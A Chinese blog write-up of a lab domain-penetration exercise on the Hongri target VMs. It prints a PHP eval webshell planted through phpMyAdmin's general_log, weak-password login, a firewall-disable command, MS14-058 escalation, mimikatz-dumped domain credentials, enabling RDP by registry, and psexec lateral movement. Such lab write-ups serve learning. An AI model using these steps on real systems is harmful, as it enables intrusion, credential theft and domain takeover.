上回遇到了域渗透题,自己没事找了个红日的靶机来学学域渗透的东西。
红日的域渗透靶机,有三台机,配了两个网段:
kali nat
win7 vm2,nat
win2008 vm2
win2003 vm2
nat为192.168.248.0/24
vm2为192.168.52.0/24
貌似环境问题,win7的靶机需要清理右下角通知区域图标:
reg delete "HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify" /va /f
taskkill /f /im explorer.exe & start explorer.exe
陆陆续续做了好久,虚拟机也重启了几次,有些ip可能变了,本文仅供参考。
靶机后续域渗透比较简单,只是一个知识的了解。
135为win7靶机,探测其服务:
root@zhang:~# nmap -sS 192.168.248.135
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-18 23:32 CST
Nmap scan report for 192.168.248.135
Host is up (0.00059s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:6E:05:E6 (VMware)
80端口看下,是个phpstudy探针:
根据如下:phpstudy探针提权
访问phpmyadmin后台root/root弱口令进入。
在探针处可以得到我们的phpstudy部署路径,到sql语句执行处写入马儿:
select "<?php @eval($_POST['hhhm']) ?>" into outfile 'C:/phpStudy/WWW/hhhm.php';
然而会发现提示不能写入:
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
好久没遇到了,回忆一下phpmyadmin日志写shell:phpmyadmin写shell方式
show global variables like "%genera%";
会得到:
我们要做就就是把第一个改为On,第二个改为我们的shell路径。
set global general_log='on';
SET global general_log_file='C:/phpStudy/WWW/hhhm.php';
select "<?php @eval($_POST['hhhm']) ?>";
set global general_log='off';
执行语句之后就会写入我们的马儿,成功拿到webshell。
这边mark一下,关闭防火墙的安全警报以避免在主机弹出提示:
netsh advfirewall set allprofiles state off
拿到webshell之后直接上传个exe,因为没有杀软所以很轻易就把shell弹到了cs上面。
可以看到是一个Administrator权限的shell。
现在着手收集一下主机的信息,先查看一些基础的信息,我收集了一些常用的命令:
ipconfig /all 查询本机IP段,所在域等
net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user 本机用户列表
net localhroup administrators 本机管理员[通常含有域用户]
net user /domain 查询域用户
net user 用户名 /domain 获取指定用户的账户信息
netstat -ano 查看开启的端口
net user /domain b404 pass 修改域内用户密码,需要管理员权限
net group /domain 查询域里面的工作组
route print 查看路由信息
netstat 查看网络服务
query user 查看最近登录信息
net group 组名 /domain 查询域中的某工作组
net group "domain admins" /domain 查询域管理员列表
net group "domain controllers" /domain 查看域控制器(如果有多台)
net time /domain 判断主域,主域服务器都做时间服务器
net accounts查看密码策略
ipconfig /all 查询本机IP段,所在域等
net view:
C:\phpStudy\WWW> net view
服务器名称 注解
-------------------------------------------------------------------------------
\\OWA
\\ROOT-TVI862UBEH
\\STU1
ipconfig /all:
并且从中可以看到dns服务器为192.168.52.138。
用cs的话方便很多,靶机在cs上线直接拿ms14-058能提权到system权限,net view扫扫能发现有另外两台机器(本机为STU1):
用mimikatz跑出来STU1的账号密码为:
GOD\Administrator hongrisec@2020
测试远程登录发现失败,扫一下端口会发现3389端口没有开启,使用命令开启:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
这就成功登录上目标机器,接下来考虑一下如何横向移动。
先创建一个SMB Beacon,因为先前抓取凭证的时候很容易就抓到了域管理员账号密码,所以这里直接使用psexec尝试登录,此时会发现又一台机器上线。
同理可以将域内另一台机器上线。
本文原创于HhhM的博客,转载请标明出处。
_ _ _ _ ___ ___ | | | | | | | | \/ | | |_| | |__ | |__ | . . | | _ | '_ \| '_ \| |\/| | | | | | | | | | | | | | | \_| |_/_| |_|_| |_\_| |_/